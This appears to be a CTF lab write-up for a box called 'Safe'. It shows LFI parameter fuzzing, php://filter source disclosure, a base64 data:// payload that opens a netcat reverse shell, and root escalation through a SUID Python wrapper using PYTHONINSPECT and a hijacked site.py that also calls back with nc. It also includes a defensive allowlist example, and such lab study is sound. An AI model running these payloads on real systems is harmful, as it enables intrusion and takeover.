:: URL : http://192.168.56.75:82/?FUZZ=../../../../../../etc/passwd
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Regexp: root:x:0:0
________________________________________________

p [Status: 200, Size: 896, Words: 1, Lines: 22, Duration: 245ms]
:: Progress: [6453/6453] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:47] :: Errors: 0 ::

With parameter p found, the rest is the usual routine: use the file inclusion to read the source, then get a reverse shell.

Using PHP stream wrappers:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl http://192.168.56.75:82/?p=php://filter/read=convert.base64-encode/resource=index.php | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 76 100 76 0 0 4302 0 0
<?php
$p = @$_GET['p'] ?: 'data:,welcome';
include $p;

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl "http://192.168.56.75:82/?p=data://text/plain;base64,PD9waHAgc3lzdGVtKCdidXN5Ym94IG5jIDE5Mi4xNjguNTYuMTA0IDQ0NDQgLWUgc2gnKTsgPz4="

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvvp 4444
listening on [any] 4444 ...
192.168.56.75: inverse host lookup failed: Unknown host
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.75] 35443
id
uid=104(apache) gid=106(apache) groups=82(www-data),106(apache),106(apache)
cd /home
ls
0x00
ls -al
total 12
drwxr-xr-x 3 root root 4096 Mar 7 11:21 .
drwxr-xr-x 22 root root 4096 Mar 8 11:43 ..
drwxr-sr-x 2 0x00 0x00 4096 Mar 7 14:26 0x00
cd 0x00
ls
my_pass
user.txt
cat my_pass
0O1XC7u6Ub18naf2
cat user.txt
flag{user-764fed0c9dca7bb3d739d2940e3a6f74}


Here we get the second flag, plus a password: 0O1XC7u6Ub18naf2

Logging in over ssh works, but any command makes the session exit immediately, so continue the analysis as the apache user instead; a custom SUID ELF turns up.
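The index.php recovered above does `include $p` with no validation, which is why a traversal path, `php://filter` and `data://` all work. The resolver below is an added example, not code from the target or from this writeup: it shows the allowlist-plus-canonical-path check that a fix needs, written in Python so it runs stand-alone. The page names, the temporary web root and the sample request values are constructed for the demo.

```python
"""Hardened resolution of a user-controlled include name.

Added example (not the target's index.php): reject stream wrappers and
schemes, absolute or traversal paths, names outside an allowlist, and any
canonical path that escapes the web root, in that order.
"""
import os
import tempfile

# Constructed allowlist: only these page names may ever be included.
ALLOWED_PAGES = {"welcome", "about", "contact"}


class IncludeRejected(ValueError):
    """Raised when the requested include name fails validation."""


def resolve_include(p: str, webroot: str) -> str:
    """Map the request parameter `p` to a file path under `webroot`."""
    if not p:
        p = "welcome"                      # same default the page used
    # A colon can only introduce a scheme or wrapper here (php://, data://).
    if ":" in p or "\\" in p or "\x00" in p:
        raise IncludeRejected(f"scheme or illegal character in {p!r}")
    if os.path.isabs(p) or ".." in p.split("/"):
        raise IncludeRejected(f"absolute or traversal path {p!r}")
    if p not in ALLOWED_PAGES:
        raise IncludeRejected(f"{p!r} not in allowlist")
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, f"{p}.php"))
    # Belt and braces: the canonical path (symlinks resolved) must stay
    # inside the web root even after the allowlist check.
    if os.path.commonpath([root, target]) != root:
        raise IncludeRejected(f"{p!r} resolves outside the web root")
    return target


def classify(requests, webroot):
    """Return {p: 'ok' | 'rejected'} for a batch of request values."""
    verdicts = {}
    for p in requests:
        try:
            resolve_include(p, webroot)
            verdicts[p] = "ok"
        except IncludeRejected:
            verdicts[p] = "rejected"
    return verdicts


# Constructed request values: the three shapes used against port 82 above
# (traversal, php://filter, data://) plus one legitimate page name.
SAMPLE_REQUESTS = [
    "welcome",
    "../../../../../../etc/passwd",
    "php://filter/read=convert.base64-encode/resource=index.php",
    "data://text/plain;base64,PD9waHA=",
]


def demo():
    """Build a throwaway web root with stub pages and classify the samples."""
    with tempfile.TemporaryDirectory() as webroot:
        for name in ALLOWED_PAGES:
            with open(os.path.join(webroot, f"{name}.php"), "w") as fh:
                fh.write("<?php echo 'stub'; ?>")
        return classify(SAMPLE_REQUESTS, webroot)


if __name__ == "__main__":
    for p, verdict in demo().items():
        print(f"{verdict:8} {p}")
```

The allowlist is the check that actually closes the hole; the realpath containment test is there for the day someone drops a symlink into the web root.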

bash: /root/.bashrc: Permission denied
Safe:/var/www/localhost/backend$ id
uid=104(apache) gid=106(apache) groups=82(www-data),106(apache),106(apache)
Safe:/var/www/localhost/backend$ find / -perm -4000 2>/dev/null
/bin/umount
/bin/bbsuid
/bin/mount
/usr/local/bin/shell-wrapper
/usr/bin/expiry
/usr/bin/chsh
/usr/bin/chage
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/chfn
/usr/sbin/suexec
Safe:/var/www/localhost/backend$

Pull it down and reverse it:

#include <unistd.h>

/* Decompiled /usr/local/bin/shell-wrapper (SUID root). setuid(0) sets real,
 * effective and saved UID to 0 in one go, and execl() hands the caller's
 * environment to the interpreter untouched, so PYTHON* variables get through. */
int main(int argc, const char **argv, const char **envp)
{
    setuid(0);
    execl("/usr/bin/python3", "python3", "/usr/local/bin/.shell.py", 0);
    return 0;
}

But we have no permission to read that script:

Safe:/var/www/localhost/backend$ cat /usr/local/bin/.shell.py 
cat: can't open '/usr/local/bin/.shell.py': Permission denied
Safe:/var/www/localhost/backend$

There are two ways to do this part as well.

On Linux, the dynamic linker (ld.so) deliberately clears dangerous environment variables such as LD_PRELOAD when it executes a SUID program, to prevent hijacking. It does not, however, clear application-specific variables such as PYTHONPATH and PYTHONINSPECT.

Worse still, the wrapper calls setuid(0). That call does not just set the effective user ID (EUID) to 0; it sets the real user ID (UID) to 0 as well. When execl launches python3, Python's underlying safety check compares the process's UID and EUID. If they differ (which indicates a SUID run), Python ignores every environment variable for safety; but here UID and EUID are both 0 (they match), so Python mistakes itself for an ordinary root process and unconditionally trusts and loads every environment variable you hand it!

1. Forcing interactive mode with PYTHONINSPECT

First set the environment variable and run the wrapper.

PYTHONINSPECT is a built-in Python environment variable. When it is set, Python does not exit after running the target script; instead it drops into an interactive Python prompt (>>>).

Safe:/var/www/localhost/backend$ export PYTHONINSPECT=1
/usr/local/bin/shell-wrapper
System Security Audit: ENABLED

0x00@Safe:~$
>>> import os
>>> os.system("/bin/sh")
/home/0x00 # id
uid=0(root) gid=106(apache) egid=0(root) groups=82(www-data),106(apache),106(apache)
/home/0x00 #

2. Module hijacking with PYTHONPATH

Whenever Python runs a script it automatically imports some low-level modules (for example the os module, or the site module that runs during startup). The PYTHONPATH environment variable lets us force a directory to the highest priority in Python's module search path.

First forge a commonly used Python module (for example site.py) under /tmp:

cd /tmp
mkdir -p hacks

Write the payload into site.py (as soon as Python imports site, our escalation code runs):

cat <<EOF > hacks/site.py
import os
os.system("busybox nc 192.168.56.104 9999 -e sh")
EOF

Set the search priority and trigger the wrapper:

Safe:/tmp/hacks$ export PYTHONPATH=/tmp/hacks
Safe:/tmp/hacks$ /usr/local/bin/shell-wrapper

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.75] 32970
/tmp/hacks # id
id
uid=0(root) gid=106(apache) egid=0(root) groups=82(www-data),106(apache),106(apache)
/tmp/hacks # ^[[45;14R

Path B

When the target boots there is a short window in which the SafeLine WAF has not finished starting yet while the network services are already up.

Here I turned the site's protection mode back on; note that welcome shows up again.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl 192.168.56.75:82 && sleep 10 && curl 192.168.56.75:82
welcome<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="icon" href="/.safeline/static/favicon.png" type="image/png"><title id="slg-title"></title><style>:root {--primary-color:#0067B8;--light-primary-color:#0067B8cc;--font-color:#fff;--light-font-color:#ffffff80;--success-color:#00b87c;--warning-color:#ff6666;--warning-font-color:#fff;--warning-light-font-color:#ffffff80;}</style><style>html{height:100%}body{height:100%;margin:0;font-family:PingFang SC,Helvetica Neue,Helvetica,Arial,sans-serif}#slg-bg{background-color:var(--primary-color);z-index:100;width:100%;height:100%;position:fixed;inset:0}#slg-box{z-index:300;border-radius:.5rem;flex-direction:column;width:90%;max-width:40rem;height:15rem;padding:1rem 0;display:flex;position:fixed;top:50%;left:50%;transform:translate(-50%,-80%)}#slg-image{flex:3;align-items:center;width:100%;padding-top:1rem;display:flex}#slg-warning{margin-left:auto;margin-right:auto}#slg-caption{text-align:center;color:var(--font-color);flex:2}#slg-text{flex:1;font-size:1.5rem;line-height:4rem;display:inline}#slg-desc{color:var(--light-font-color);font-size:.8rem;line-height:2rem}#slg-copyright{text-align:center;z-index:2000;width:100%;height:10rem;font-size:1rem;position:absolute;bottom:0}#slg-more-info{color:var(--font-color);margin-bottom:1rem;font-size:.8rem;line-height:2rem}#slg-copyright a{color:var(--light-font-color);text-decoration:none}#slg-copyright a:hover,#slg-name{color:var(--font-color)}#slg-copyright-text{margin-top:1rem}</style><script>document.documentElement.style.setProperty("--primary-color","var(--warning-color)"),document.documentElement.style.setProperty("--font-color","var(--warning-font-color)"),document.documentElement.style.setProperty("--light-font-color","var(--warning-light-font-color)");</script><script>window.product_data = 
{"favicon":"","name":"","name_en":"","product":"","community":"","link":"","link_en":"","self":false};</script></head><body> <div id="slg-bg"></div> <div id="slg-box"> <div id="slg-image"> <svg id="slg-warning" width="68" height="59"><g fill="var(--font-color)"><g><path d="M29.455 2.852c2.062-3.527 6.151-4.07 8.48 0 1.538 2.527 7.818 13.159 14.15 23.904l.827 1.401.412.7.823 1.396A32540 32540 0 0 1 67.03 52.144l.02.038c.26.507 2.626 5.356-1.267 6.818H3.356s-6.846-1.44-.983-9.723c2.345-3.963 8.37-14.306 14.423-24.7l1.008-1.73c4.476-7.689 8.855-15.211 11.651-19.995m4.526 40.47c-2.157 0-3.905 1.74-3.905 3.885s1.748 3.884 3.905 3.884 3.905-1.739 3.905-3.884-1.748-3.884-3.905-3.884m.042-23.955c-2.18 0-3.947 1.758-3.947 3.926V35.69c0 2.168 1.767 3.926 3.947 3.926s3.947-1.757 3.947-3.926V23.293c0-2.168-1.767-3.926-3.947-3.926"/></g></g></svg> </div> <div id="slg-caption"> <div id="slg-text"></div> <div id="slg-desc"></div> </div> </div> <div id="slg-copyright"> <div id="slg-more-info"></div> <a id="slg-link"> <div id="slg-logo" style="display:none"> <svg width="32" height="35"><g fill="var(--font-color)"><path d="M15.006.33c.602-.44 1.4-.44 2.002 0 1.985 1.444 6.911 4.473 12.901 4.631.78.035 1.418.599 1.577 1.356.922 4.754 2.605 20.848-15.452 28.35C-2.077 27.183-.43 11.07.528 6.317c.142-.757.815-1.32 1.577-1.356 5.99-.158 10.863-3.187 12.9-4.63m1.037 4.54c-.28 1.647-2.15 1.938-2.15 1.938-1.9.309-2.819-1.12-2.819-1.12.82 2.255 2.198 2.391 2.446 2.397h2.423c-.7 1.802-3.48 2.133-3.48 2.133-3.159.39-4.689-1.423-4.689-1.423q.17.357.358.66l-.008-.005a11 11 0 0 0-3.106 7.671c0 6.09 4.937 11.026 11.026 11.026 6.09 0 11.027-4.936 11.027-11.026a11 11 0 0 0-3.11-7.674q.185-.3.353-.652s-1.53 1.816-4.69 1.423c0 0-2.776-.33-3.478-2.132h2.42c.245-.006 1.627-.14 2.448-2.397 0 0-.92 1.428-2.82 1.12-.142-.025-1.882-.356-2.15-1.94"/><polygon points="15.98353 17.9879553 9.8818726 21.4510476 15.3313444 24.6578974 17.2903808 23.6211992 13.5799337 21.4510476 15.98353 20.0985396 20.3159976 
22.5564681 20.3159976 23.3648458 22.2042418 24.5010295 22.2042418 21.4510476" transform="rotate(-180 16.043 21.323)"/><polygon points="15.9835296 10.9942305 9.8818722 14.4573228 15.331344 17.6641726 17.2903804 16.6274743 13.5799333 14.4573228 15.9835296 13.1048148 20.3159972 15.5627433 20.3159972 16.371121 22.2042414 17.5073047 22.2042414 14.4573228"/></g></svg> </div> <div id="slg-copyright-text"> <span id="slg-prefix"></span> <span id="slg-name"></span> <span id="slg-suffix"></span> </div> </a> </div> <script>var e;const n={unknown:{en:"Unknown Error",zh:"未知错误"},title:{en:"Protected By "+window.product_data?.name_en+" WAF",zh:window.product_data?.name+" WAF"},prefix:{en:"Security Detection Powered By",zh:"安全检测能力由"},suffix:{en:"",zh:"驱动"},name:{en:window.product_data?.name_en+" WAF",zh:window.product_data?.name+" WAF"},link:{en:window.product_data?.link_en,zh:window.product_data?.link},decrypting:{en:"Dynamic Decrypting",zh:"网页被保护,正在解密中"},failed:{en:"Decryption Failed",zh:"解密失败"},blocking:{en:"Access Forbidden",zh:"访问已被拦截"},"attack-desc":{en:"Blocked For Attack Detected",zh:"请求存在恶意行为,已被管理员拦截"},"too-fast-desc":{en:"Blocked for Access Too Fast",zh:"请求频率过高,已被管理员拦截"},"page-not-found-desc":{en:"The Page You Visited Does Not Exist",zh:"您访问的页面不存在"},"site-not-found":{en:"Website Not Found",zh:"网站不存在"},"site-not-found-desc":{en:"The Domain Name You Visited Does not Match The Server",zh:"您访问的域名与服务器不匹配"},offline:{en:"Website is Offline, Please Visit Later",zh:"网站维护中,暂时无法访问"},"gateway-error-desc":{en:"Server Response Error, Please Try Again Later",zh:"网站服务器异常,请稍后再试"},"gateway-timeout-desc":{en:"Server Response Timeout, Please Try Again Later",zh:"网站服务器响应超时,请稍后再试"},"it-works":{en:"It Works!",zh:"网站搭建成功"}};function t(e){let t=n[e];for(language in void 0===t&&(t=n.unknown),t)if(navigator.language.startsWith(language))return t[language];return t.en}function o(e,n,t){let 
o=document.getElementById(e);o&&(o[n]=t)}o("slg_title","innerText",t("title")),o("slg-link","href",t("link")),o("slg-prefix","innerText",t("prefix")),o("slg-name","innerText",t("name")),o("slg-suffix","innerText",t("suffix")),window.product_data?.self?document.getElementById("slg-logo").style.display="block":(document.getElementById("slg-logo").remove(),document.querySelector('link[rel="icon"]').href=window.product_data?.favicon),e=t("offline"),o("slg-text","innerText",e),o("slg-desc","innerText","");</script> </body></html><script>console.log("hashID: a8023d9");</script><!-- event_id: 33ac0e3062384da29859f20a5a5f3858 -->

That short window is enough for us to fuzz port 82.

So in theory you can skip the log-credential route entirely and fuzz port 82 directly.

Catching a shell works the same way.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl "http://192.168.56.75:82/?p=data://text/plain;base64,PD9waHAgc3lzdGVtKCdidXN5Ym94IG5jIDE5Mi4xNjguNTYuMTA0IDQ0NDQgLWUgc2gnKTsgPz4="
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 4444
[+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Safe-192.168.56.75-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/Safe~192.168.56.75_Linux_x86_64/2026_05_03-08_48_10-720.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Safe:/var/www/localhost/backend$ id
uid=104(apache) gid=106(apache) groups=82(www-data),106(apache),106(apache)
Safe:/var/www/localhost/backend$

SafeLine is a bit underwhelming here: the shell we connected was not cut off at all.


Mazesec-Safe
http://example.com/2026/05/03/Mazesec-Safe/
Author: Skyarrow
Posted on May 3, 2026
Licensed under